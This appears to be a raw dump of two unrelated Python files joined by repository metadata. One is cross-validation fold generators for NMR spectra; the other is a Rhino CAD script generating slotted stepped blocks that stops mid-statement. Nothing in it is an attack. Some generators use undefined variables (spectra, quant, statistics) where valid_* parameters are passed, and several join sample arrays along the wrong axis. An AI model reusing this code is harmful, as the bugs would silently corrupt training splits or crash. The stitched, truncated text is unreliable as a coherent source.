test_fold["spectra"] = spectra[test_fold_idx,:]
test_fold["quant"] = quant[test_fold_idx,:]
test_fold["ppm_spectra"] = ppm_spectra[test_fold_idx,:]
test_fold["class_labels"] = class_labels[test_fold_idx,:]
test_fold["stats"] = statistics.iloc[test_fold_idx,:].reset_index(drop=True)
vald_fold_idx = fold_dct[str((cur_iter+1) % k)]
vald_fold = {}
vald_fold["spectra"] = spectra[vald_fold_idx,:]
vald_fold["quant"] = quant[vald_fold_idx,:]
vald_fold["ppm_spectra"] = ppm_spectra[vald_fold_idx,:]
vald_fold["class_labels"] = class_labels[vald_fold_idx,:]
vald_fold["stats"] = statistics.iloc[vald_fold_idx,:].reset_index(drop=True)
train_fold_indices = list(range(k))
train_fold_indices.remove(cur_iter)
train_fold_indices.remove((cur_iter+1) % k)
train_fold_idx = [] + fold_dct[str(train_fold_indices[0])] + fold_dct[str(train_fold_indices[1])] + fold_dct[str(train_fold_indices[2])]
train_fold = {}
train_fold["spectra"] = spectra[train_fold_idx,:]
train_fold["quant"] = quant[train_fold_idx,:]
train_fold["ppm_spectra"] = ppm_spectra[train_fold_idx,:]
train_fold["class_labels"] = class_labels[train_fold_idx,:]
train_fold["stats"] = statistics.iloc[train_fold_idx,:].reset_index(drop=True)
all_data = {}
all_data["spectra"] = spectra
all_data["quant"] = quant
all_data["ppm_spectra"] = ppm_spectra
all_data["class_labels"] = class_labels
all_data["stats"] = statistics
yield (train_fold_idx, vald_fold_idx, test_fold_idx, train_fold, vald_fold, test_fold, all_data)
cur_iter += 1
# Option #1.B: only valid PC and fully quantified samples (train and test)
def cpmg_generator_1B(k, fold_dct, statistics, spectra, ppm_spectra, quant, class_labels):
cur_iter = 0
while cur_iter < k:
test_fold_idx = fold_dct[str(cur_iter)]
test_fold = {}
test_fold["spectra"] = spectra[test_fold_idx,:]
test_fold["quant"] = quant[test_fold_idx,:]
test_fold["ppm_spectra"] = ppm_spectra[test_fold_idx,:]
test_fold["class_labels"] = class_labels[test_fold_idx,:]
test_fold["stats"] = statistics.iloc[test_fold_idx,:].reset_index(drop=True)
train_fold_indices = list(range(k))
train_fold_indices.remove(cur_iter)
train_fold_idx = [] + fold_dct[str(train_fold_indices[0])] + fold_dct[str(train_fold_indices[1])] + fold_dct[str(train_fold_indices[2])] + fold_dct[str(train_fold_indices[3])]
train_fold = {}
train_fold["spectra"] = spectra[train_fold_idx,:]
train_fold["quant"] = quant[train_fold_idx,:]
train_fold["ppm_spectra"] = ppm_spectra[train_fold_idx,:]
train_fold["class_labels"] = class_labels[train_fold_idx,:]
train_fold["stats"] = statistics.iloc[train_fold_idx,:].reset_index(drop=True)
all_data = {}
all_data["spectra"] = spectra
all_data["quant"] = quant
all_data["ppm_spectra"] = ppm_spectra
all_data["class_labels"] = class_labels
all_data["stats"] = statistics
yield (train_fold_idx, test_fold_idx, train_fold, test_fold, all_data)
cur_iter += 1
# Option #2.A: valid PC and fully quantified samples form test folds
# but invalid samples are injected to the training dataset by hand (train, vald and test)
def cpmg_generator_2A(k, fold_dct, valid_statistics, valid_spectra, valid_ppm_spectra, valid_quant, valid_class_labels,\
invalid_statistics, invalid_spectra, invalid_ppm_spectra, invalid_quant):
cur_iter = 0
while cur_iter < k:
test_fold_idx = fold_dct[str(cur_iter)]
test_fold = {}
test_fold["spectra"] = spectra[test_fold_idx,:]
test_fold["quant"] = quant[test_fold_idx,:]
test_fold["ppm_spectra"] = ppm_spectra[test_fold_idx,:]
test_fold["class_labels"] = class_labels[test_fold_idx,:]
test_fold["stats"] = statistics.iloc[test_fold_idx,:].reset_index(drop=True)
vald_fold_idx = fold_dct[str((cur_iter+1) % k)]
vald_fold = {}
vald_fold["spectra"] = spectra[vald_fold_idx,:]
vald_fold["quant"] = quant[vald_fold_idx,:]
vald_fold["ppm_spectra"] = ppm_spectra[vald_fold_idx,:]
vald_fold["class_labels"] = class_labels[vald_fold_idx,:]
vald_fold["stats"] = statistics.iloc[vald_fold_idx,:].reset_index(drop=True)
invalid_sample_cnt = invalid_spectra.shape[0]
train_fold_indices = list(range(k))
train_fold_indices.remove(cur_iter)
train_fold_indices.remove((cur_iter+1) % k)
train_fold_idx = [] + fold_dct[str(train_fold_indices[0])] + fold_dct[str(train_fold_indices[1])] + fold_dct[str(train_fold_indices[2])]
train_fold = {}
train_fold["spectra"] = np.concat((spectra[train_fold_idx,:], invalid_spectra[:,:]), axis=0)
train_fold["quant"] = np.concat((quant[train_fold_idx,:], invalid_quant[:,:]), axis=0)
train_fold["ppm_spectra"] = np.concat((ppm_spectra[train_fold_idx,:], invalid_ppm_spectra[:,:]), axis=0)
train_fold["class_labels"] = np.concat((class_labels[train_fold_idx,:], np.array([-1]*invalid_sample_cnt).reshape((-1,1))), axis=1)
train_fold["stats"] = pd.concat([statistics.iloc[train_fold_idx,:], invalid_statistics]).reset_index(drop=True)
all_data = {}
all_data["spectra"] = spectra
all_data["quant"] = quant
all_data["ppm_spectra"] = ppm_spectra
all_data["class_labels"] = class_labels
all_data["stats"] = statistics
yield (train_fold_idx, vald_fold_idx, test_fold_idx, train_fold, vald_fold, test_fold, all_data)
cur_iter += 1
# Option #2.B: valid PC and fully quantified samples form test folds
# but invalid samples are injected to the training dataset by hand (train, vald and test)
def cpmg_generator_2B(k, fold_dct, valid_statistics, valid_spectra, valid_ppm_spectra, valid_quant, valid_class_labels,\
invalid_statistics, invalid_spectra, invalid_ppm_spectra, invalid_quant):
cur_iter = 0
while cur_iter < k:
test_fold_idx = fold_dct[str(cur_iter)]
test_fold = {}
test_fold["spectra"] = spectra[test_fold_idx,:]
test_fold["quant"] = quant[test_fold_idx,:]
test_fold["ppm_spectra"] = ppm_spectra[test_fold_idx,:]
test_fold["class_labels"] = class_labels[test_fold_idx,:]
test_fold["stats"] = statistics.iloc[test_fold_idx,:].reset_index(drop=True)
invalid_sample_cnt = invalid_spectra.shape[0]
train_fold_indices = list(range(k))
train_fold_indices.remove(cur_iter)
train_fold_idx = [] + fold_dct[str(train_fold_indices[0])] + fold_dct[str(train_fold_indices[1])] + fold_dct[str(train_fold_indices[2])] + fold_dct[str(train_fold_indices[3])]
train_fold = {}
train_fold["spectra"] = np.concat((spectra[train_fold_idx,:], invalid_spectra[:,:]), axis=0)
train_fold["quant"] = np.concat((quant[train_fold_idx,:], invalid_quant[:,:]), axis=0)
train_fold["ppm_spectra"] = np.concat((ppm_spectra[train_fold_idx,:], invalid_ppm_spectra[:,:]), axis=0)
train_fold["class_labels"] = np.concat((class_labels[train_fold_idx,:], np.array([-1]*invalid_sample_cnt).reshape((-1,1))), axis=1)
train_fold["stats"] = pd.concat([statistics.iloc[train_fold_idx,:], invalid_statistics]).reset_index(drop=True)
all_data = {}
all_data["spectra"] = spectra
all_data["quant"] = quant
all_data["ppm_spectra"] = ppm_spectra
all_data["class_labels"] = class_labels
all_data["stats"] = statistics
yield (train_fold_idx, test_fold_idx, train_fold, test_fold, all_data)
cur_iter += 1
# Option #3.A: only valid PC samples form test folds (train, vald and test)
def cpmg_generator_3A(k, fold_dct, statistics, spectra, ppm_spectra, quant, quant_availability, class_labels):
cur_iter = 0
while cur_iter < k:
test_fold_idx = fold_dct[str(cur_iter)]
test_fold = {}
test_fold["spectra"] = spectra[test_fold_idx,:]
test_fold["quant"] = quant[test_fold_idx,:]
test_fold["quant_availability"] = quant_availability[test_fold_idx,:]
test_fold["ppm_spectra"] = ppm_spectra[test_fold_idx,:]
test_fold["class_labels"] = class_labels[test_fold_idx,:]
test_fold["stats"] = statistics.iloc[test_fold_idx,:].reset_index(drop=True)
vald_fold_idx = fold_dct[str((cur_iter+1) % k)]
vald_fold = {}
vald_fold["spectra"] = spectra[vald_fold_idx,:]
vald_fold["quant"] = quant[vald_fold_idx,:]
vald_fold["quant_availability"] = quant_availability[vald_fold_idx,:]
vald_fold["ppm_spectra"] = ppm_spectra[vald_fold_idx,:]
vald_fold["class_labels"] = class_labels[vald_fold_idx,:]
vald_fold["stats"] = statistics.iloc[vald_fold_idx,:].reset_index(drop=True)
train_fold_indices = list(range(k))
train_fold_indices.remove(cur_iter)
train_fold_indices.remove((cur_iter+1) % k)
train_fold_idx = [] + fold_dct[str(train_fold_indices[0])] + fold_dct[str(train_fold_indices[1])] + fold_dct[str(train_fold_indices[2])]
train_fold = {}
train_fold["spectra"] = spectra[train_fold_idx,:]
train_fold["quant"] = quant[train_fold_idx,:]
train_fold["quant_availability"] = quant_availability[train_fold_idx,:]
train_fold["ppm_spectra"] = ppm_spectra[train_fold_idx,:]
train_fold["class_labels"] = class_labels[train_fold_idx,:]
train_fold["stats"] = statistics.iloc[train_fold_idx,:].reset_index(drop=True)
all_data = {}
all_data["spectra"] = spectra
all_data["quant"] = quant
all_data["quant_availability"] = quant_availability
all_data["ppm_spectra"] = ppm_spectra
all_data["class_labels"] = class_labels
all_data["stats"] = statistics
yield (train_fold_idx, vald_fold_idx, test_fold_idx, train_fold, vald_fold, test_fold, all_data)
cur_iter += 1
# Option #3.B: only valid PC samples form test folds (train and test)
def cpmg_generator_3B(k, fold_dct, statistics, spectra, ppm_spectra, quant, quant_availability, class_labels):
cur_iter = 0
while cur_iter < k:
test_fold_idx = fold_dct[str(cur_iter)]
test_fold = {}
test_fold["spectra"] = spectra[test_fold_idx,:]
test_fold["quant"] = quant[test_fold_idx,:]
test_fold["quant_availability"] = quant_availability[test_fold_idx,:]
test_fold["ppm_spectra"] = ppm_spectra[test_fold_idx,:]
test_fold["class_labels"] = class_labels[test_fold_idx,:]
test_fold["stats"] = statistics.iloc[test_fold_idx,:].reset_index(drop=True)
train_fold_indices = list(range(k))
train_fold_indices.remove(cur_iter)
train_fold_idx = [] + fold_dct[str(train_fold_indices[0])] + fold_dct[str(train_fold_indices[1])] + fold_dct[str(train_fold_indices[2])] + fold_dct[str(train_fold_indices[3])]
train_fold = {}
train_fold["spectra"] = spectra[train_fold_idx,:]
train_fold["quant"] = quant[train_fold_idx,:]
train_fold["quant_availability"] = quant_availability[train_fold_idx,:]
train_fold["ppm_spectra"] = ppm_spectra[train_fold_idx,:]
train_fold["class_labels"] = class_labels[train_fold_idx,:]
train_fold["stats"] = statistics.iloc[train_fold_idx,:].reset_index(drop=True)
all_data = {}
all_data["spectra"] = spectra
all_data["quant"] = quant
all_data["quant_availability"] = quant_availability
all_data["ppm_spectra"] = ppm_spectra
all_data["class_labels"] = class_labels
all_data["stats"] = statistics
yield (train_fold_idx, test_fold_idx, train_fold, test_fold, all_data)
cur_iter += 1
# Option #4.A: only valid PC samples form test folds
# but invalid pc samples are injected to the training dataset
def cpmg_generator_4A(k, fold_dct, valid_statistics, valid_spectra, valid_ppm_spectra, valid_quant, valid_quant_availability, valid_class_labels,\
invalid_statistics, invalid_spectra, invalid_ppm_spectra, invalid_quant, invalid_quant_availability):
cur_iter = 0
while cur_iter < k:
test_fold_idx = fold_dct[str(cur_iter)]
test_fold = {}
test_fold["spectra"] = valid_spectra[test_fold_idx,:]
test_fold["quant"] = valid_quant[test_fold_idx,:]
test_fold["quant_availability"] = valid_quant_availability[test_fold_idx,:]
test_fold["ppm_spectra"] = valid_ppm_spectra[test_fold_idx,:]
test_fold["class_labels"] = valid_class_labels[test_fold_idx,:]
test_fold["stats"] = valid_statistics.iloc[test_fold_idx,:].reset_index(drop=True)
vald_fold_idx = fold_dct[str((cur_iter+1) % k)]
vald_fold = {}
vald_fold["spectra"] = valid_spectra[vald_fold_idx,:]
vald_fold["quant"] = valid_quant[vald_fold_idx,:]
vald_fold["quant_availability"] = valid_quant_availability[vald_fold_idx,:]
vald_fold["ppm_spectra"] = valid_ppm_spectra[vald_fold_idx,:]
vald_fold["class_labels"] = valid_class_labels[vald_fold_idx,:]
vald_fold["stats"] = valid_statistics.iloc[vald_fold_idx,:].reset_index(drop=True)
invalid_sample_cnt = invalid_spectra.shape[0]
train_fold_indices = list(range(k))
train_fold_indices.remove(cur_iter)
train_fold_indices.remove((cur_iter+1) % k)
train_fold_idx = [] + fold_dct[str(train_fold_indices[0])] + fold_dct[str(train_fold_indices[1])] + fold_dct[str(train_fold_indices[2])]
train_fold = {}
train_fold["spectra"] = np.concat((valid_spectra[train_fold_idx,:],invalid_spectra[:,:]), axis=1)
train_fold["quant"] = np.concat((valid_quant[train_fold_idx,:],invalid_quant[:,:]), axis=1)
train_fold["quant_availability"] = np.concat((valid_quant_availability[train_fold_idx,:],invalid_quant_availability[:,:]), axis=1)
train_fold["ppm_spectra"] = np.concat((valid_ppm_spectra[train_fold_idx,:],invalid_ppm_spectra[:,:]), axis=1)
train_fold["class_labels"] = np.concat((valid_class_labels[train_fold_idx,:],np.array([-1]*invalid_sample_cnt).reshape((-1,1))), axis=1)
train_fold["stats"] = pd.concat([valid_statistics.iloc[train_fold_idx,:].reset_index(drop=True),invalid_statistics])
all_data = {}
all_data["spectra"] = valid_spectra
all_data["quant"] = valid_quant
all_data["quant_availability"] = valid_quant_availability
all_data["ppm_spectra"] = valid_ppm_spectra
all_data["class_labels"] = valid_class_labels
all_data["stats"] = valid_statistics
yield (train_fold_idx, vald_fold_idx, test_fold_idx, train_fold, vald_fold, test_fold, all_data)
cur_iter += 1
# Option #4.B: only valid PC samples form test folds
# but invalid pc samples are injected to the training dataset
def cpmg_generator_4B(k, fold_dct, valid_statistics, valid_spectra, valid_ppm_spectra, valid_quant, valid_quant_availability, valid_class_labels,\
invalid_statistics, invalid_spectra, invalid_ppm_spectra, invalid_quant, invalid_quant_availability):
cur_iter = 0
while cur_iter < k:
test_fold_idx = fold_dct[str(cur_iter)]
test_fold = {}
test_fold["spectra"] = valid_spectra[test_fold_idx,:]
test_fold["quant"] = valid_quant[test_fold_idx,:]
test_fold["quant_availability"] = valid_quant_availability[test_fold_idx,:]
test_fold["ppm_spectra"] = valid_ppm_spectra[test_fold_idx,:]
test_fold["class_labels"] = valid_class_labels[test_fold_idx,:]
test_fold["stats"] = valid_statistics.iloc[test_fold_idx,:].reset_index(drop=True)
invalid_sample_cnt = invalid_spectra.shape[0]
train_fold_indices = list(range(k))
train_fold_indices.remove(cur_iter)
train_fold_idx = [] + fold_dct[str(train_fold_indices[0])] + fold_dct[str(train_fold_indices[1])] + fold_dct[str(train_fold_indices[2])] + fold_dct[str(train_fold_indices[3])]
train_fold = {}
train_fold["spectra"] = np.concat((valid_spectra[train_fold_idx,:],invalid_spectra[:,:]), axis=1)
train_fold["quant"] = np.concat((valid_quant[train_fold_idx,:],invalid_quant[:,:]), axis=1)
train_fold["quant_availability"] = np.concat((valid_quant_availability[train_fold_idx,:],invalid_quant_availability[:,:]), axis=1)
train_fold["ppm_spectra"] = np.concat((valid_ppm_spectra[train_fold_idx,:],invalid_ppm_spectra[:,:]), axis=1)
train_fold["class_labels"] = np.concat((valid_class_labels[train_fold_idx,:],np.array([-1]*invalid_sample_cnt).reshape((-1,1))), axis=1)
train_fold["stats"] = pd.concat([valid_statistics.iloc[train_fold_idx,:].reset_index(drop=True),invalid_statistics])
all_data = {}
all_data["spectra"] = valid_spectra
all_data["quant"] = valid_quant
all_data["quant_availability"] = valid_quant_availability
all_data["ppm_spectra"] = valid_ppm_spectra
all_data["class_labels"] = valid_class_labels
all_data["stats"] = valid_statistics
yield (train_fold_idx, test_fold_idx, train_fold, test_fold, all_data)
cur_iter += 1
| 53.037143
| 185
| 0.674999
| 2,539
| 18,563
| 4.523434
| 0.0449
| 0.13165
| 0.057466
| 0.057466
| 0.965259
| 0.964824
| 0.959512
| 0.952111
| 0.9266
| 0.917632
| 0
| 0.007166
| 0.195604
| 18,563
| 350
| 186
| 53.037143
| 0.761988
| 0.044659
| 0
| 0.897887
| 0
| 0
| 0.083314
| 0.002837
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0
| 0.028169
| 0
| 0.056338
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62977ec9e8e6bc7ad876840aae510ac2f62bd01e
| 46,796
|
py
|
Python
|
GeneratorScripts/CADGeneratorModel4.py
|
ankitpatnala/RhinoScriptsForSlots
|
bde3974799b74fda9da7fd928a6b6848db99a94f
|
[
"MIT"
] | null | null | null |
GeneratorScripts/CADGeneratorModel4.py
|
ankitpatnala/RhinoScriptsForSlots
|
bde3974799b74fda9da7fd928a6b6848db99a94f
|
[
"MIT"
] | null | null | null |
GeneratorScripts/CADGeneratorModel4.py
|
ankitpatnala/RhinoScriptsForSlots
|
bde3974799b74fda9da7fd928a6b6848db99a94f
|
[
"MIT"
] | null | null | null |
import Rhino
import scriptcontext
import rhinoscriptsyntax as rs
import System.Guid
import random
import json
import sys
import os
import math
def SquareDistanceBetweenTwoPoints(point1,point2):
difference = Rhino.Geometry.Point3d((point2.X-point1.X),
(point2.Y-point1.Y),
(point2.Z-point1.Z))
return difference.X*difference.X + difference.Y*difference.Y +difference.Z*difference.Z
def AddBrepBox(point1, point2):
box = Rhino.Geometry.BoundingBox(point1, point2)
brep = box.ToBrep()
rc = Rhino.Commands.Result.Failure
return brep
def AddCylinder(centerPoint,orientation,radius,height):
plane = Rhino.Geometry.Plane(centerPoint, orientation)
circle = Rhino.Geometry.Circle(plane, radius)
cylinder = Rhino.Geometry.Cylinder(circle, height)
brep = cylinder.ToBrep(True, True)
return brep
def GenerateSlotsForSteppedModel():
point1 = Rhino.Geometry.Point3d(10 + random.random()*5,
10 + random.random()*5,
10 + random.random()*5)
point2 = Rhino.Geometry.Point3d(point1.X + 10 + random.random()*5,
point1.Y,
point1.Z + 10 + random.random())
brepBox1 = AddBrepBox(Rhino.Geometry.Point3d(0,0,0),point1)
brepBox2 = AddBrepBox(Rhino.Geometry.Point3d(point1.X,0,0),
Rhino.Geometry.Point3d(point2))
brepArray = [brepBox1,brepBox2]
tolerance = scriptcontext.doc.ModelAbsoluteTolerance
orientationIdx = random.randint(0,5)
straight = bool(random.randint(0,1))
leftMargin = 3
filled = False
height = 2 + random.random()*2
randomEdge = random.randint(0,3)
filletRadius = 2+ 2*random.random()
if(randomEdge == 0):
filletBrepBox = AddBrepBox(Rhino.Geometry.Point3d(0,0,0),Rhino.Geometry.Point3d(filletRadius,filletRadius,point1.Z))
filletCylinder = AddCylinder(Rhino.Geometry.Point3d(filletRadius,filletRadius,0),Rhino.Geometry.Vector3d(0,0,1),filletRadius,point1.Z)
brepFillet = Rhino.Geometry.Brep.CreateBooleanDifference(filletBrepBox,filletCylinder,tolerance)[0]
elif(randomEdge == 1):
filletBrepBox = AddBrepBox(Rhino.Geometry.Point3d(point2.X - filletRadius,0,0),Rhino.Geometry.Point3d(point2.X,filletRadius,point2.Z))
filletCylinder = AddCylinder(Rhino.Geometry.Point3d(point2.X - filletRadius,filletRadius,0),Rhino.Geometry.Vector3d(0,0,1),filletRadius,point2.Z)
brepFillet = Rhino.Geometry.Brep.CreateBooleanDifference(filletBrepBox,filletCylinder,tolerance)[0]
elif(randomEdge == 2):
filletBrepBox = AddBrepBox(Rhino.Geometry.Point3d(point2.X - filletRadius,point2.Y - filletRadius ,0),Rhino.Geometry.Point3d(point2.X,point2.Y,point2.Z))
filletCylinder = AddCylinder(Rhino.Geometry.Point3d(point2.X - filletRadius,point2.Y - filletRadius ,0),Rhino.Geometry.Vector3d(0,0,1),filletRadius,point2.Z)
brepFillet = Rhino.Geometry.Brep.CreateBooleanDifference(filletBrepBox,filletCylinder,tolerance)[0]
else:
filletBrepBox = AddBrepBox(Rhino.Geometry.Point3d(0,point1.Y - filletRadius ,0),Rhino.Geometry.Point3d(filletRadius,point1.Y,point1.Z))
filletCylinder = AddCylinder(Rhino.Geometry.Point3d(filletRadius,point1.Y - filletRadius ,0),Rhino.Geometry.Vector3d(0,0,1),filletRadius,point1.Z)
brepFillet = Rhino.Geometry.Brep.CreateBooleanDifference(filletBrepBox,filletCylinder,tolerance)[0]
if(orientationIdx == 0):
lowerBlock = bool(random.randint(0,1))
if(straight):
xAxis = bool(random.randint(0,1))
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point1.X-leftMargin)
leftPointY = leftMargin + random.random()*(point1.Y- leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point1.X-leftPointX-3)
rightPointY = leftPointY
width = 2.5 + random.random()*(min(leftPointY,point2.Y-leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,leftPointY-width/2,point1.Z-height)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX, rightPointY + width/2,point1.Z)
else:
rightPointX = leftPointX
rightPointY = leftPointY + random.random()*(point1.Y - leftPointY)
width = 2.5 + random.random()*(min(leftPointX,point2.X-leftPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX-width/2,leftPointY,point1.Z-height)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,rightPointY,point1.Z)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointX = point1.X + leftMargin + random.random()*(point2.X - point1.X - leftMargin)
leftPointY = leftMargin + random.random()*(point2.Y- leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X-leftPointX-3)
rightPointY = leftPointY
width = 2.5 + random.random()*(min(leftPointY,point2.Y-leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,leftPointY-width/2,point2.Z-height)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX, rightPointY + width/2,point2.Z)
else:
rightPointX = leftPointX
rightPointY = leftPointY + random.random()*(point2.Y - leftPointY-3)
width = 2.5 + random.random()*(min(leftPointX,point2.X-leftPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX-width/2,leftPointY,point2.Z-height)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,rightPointY,point2.Z)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,leftPointY,0),
Rhino.Geometry.Point3d(rightPointX,rightPointY,0))
else:
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point1.X-leftMargin)
leftPointY = leftMargin + random.random()*(point1.Y-leftMargin)
rightPointX = leftPointX + random.random()*(point1.X - leftPointX-3)
rightPointY = leftPointY + random.random()*(point1.Y - leftPointY-3)
width = 2.5 + random.random()*(min(leftPointY,point1.Y-rightPointY)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,leftPointY,0),
Rhino.Geometry.Point3d(rightPointX,rightPointY,0))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointX-leftPointX),(rightPointY-leftPointY),0)
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,point1.Z - height),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,point1.Z - height),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,point1.Z - height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,point1.Z - height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,point1.Z),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,point1.Z),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,point1.Z),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,point1.Z)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
leftPointX = leftMargin + point1.X + random.random()*(point2.X - leftMargin - point1.X)
leftPointY = leftMargin + random.random()*(point2.Y - leftMargin)
rightPointX = leftPointX + random.random()*(point2.X - leftPointX-3)
rightPointY = leftPointY + random.random()*(point2.Y - leftPointY -3)
width = 2.5 + random.random()*(min(leftPointY, point1.Y - leftPointY)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,leftPointY,0),
Rhino.Geometry.Point3d(rightPointX,rightPointY,0))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointX-leftPointX),(rightPointY-leftPointY),0)
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,point2.Z - height),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,point2.Z - height),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,point2.Z - height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,point2.Z - height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,point2.Z),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,point2.Z),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,point2.Z),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,point2.Z)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
elif (orientationIdx == 1):
leftPointX = leftMargin + random.random()*(point2.X-leftMargin)
leftPointY = leftMargin + random.random()*(point2.Y-leftMargin)
if(straight):
xAxis = bool(random.randint(0,1))
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X - leftPointX-3)
rightPointY = leftPointY
width = 2.5 + random.random()*(min(leftPointY,point2.Y - leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,leftPointY - width/2,0)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX,rightPointY + width/2,height)
else:
rightPointX = leftPointX
rightPointY = leftPointY + random.random()*(point2.Y - leftPointY -3)
width = 2.5 + random.random()*(min(leftPointX,point2.X - leftPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX - width/2,leftPointY,0)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,rightPointY, height)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,leftPointY,0),
Rhino.Geometry.Point3d(rightPointX,rightPointY,0))
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepTotalVolume = brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
rightPointX = leftPointX + random.random()*(point2.X-leftPointX)
rightPointY = leftPointY + random.random()*(point2.Y -leftPointY)
width = 2.5 + random.random()*(min(leftPointY,
point2.Y -leftPointY,
rightPointY,
point2.Y -rightPointY)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,leftPointY,0),
Rhino.Geometry.Point3d(rightPointX,rightPointY,0))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointX-leftPointX),(rightPointY-leftPointY),0)
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,height),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,height),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,height),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,height),
